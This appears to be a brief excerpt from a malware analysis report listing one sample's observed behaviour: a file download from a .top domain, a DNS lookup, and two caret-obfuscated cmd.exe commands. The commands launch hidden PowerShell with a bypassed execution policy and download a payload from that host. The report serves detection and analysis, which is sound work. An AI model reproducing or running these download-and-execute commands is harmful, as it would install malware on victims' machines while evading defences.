Technical Information
- http://mondayhelthc.top/read.php?f=0.dat as %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "Po^W^ErS^hEl^l^.EX^E -^eX^Ec^UTi^onp^oliCY b^y^p^AS^s -No^PR^Of^i^lE -w^iNdo^wSTyLe Hi^DDeN ^(NeW-o^BjEc^t ^sySt^eM.NET.we^bcLi^E^Nt^)^.DownlO^adFIlE^(^'http://mondayhelthc.to...
- DNS ASK mo####helthc.top
- '<SYSTEM32>\cmd.exe' /c "Po^W^ErS^hEl^l^.EX^E -^eX^Ec^UTi^onp^oliCY b^y^p^AS^s -No^PR^Of^i^lE -w^iNdo^wSTyLe Hi^DDeN ^(NeW-o^BjEc^t ^sySt^eM.NET.we^bcLi^E^Nt^)^.DownlO^adFIlE^(^'http://mondayhelthc.to...' (with hidden window)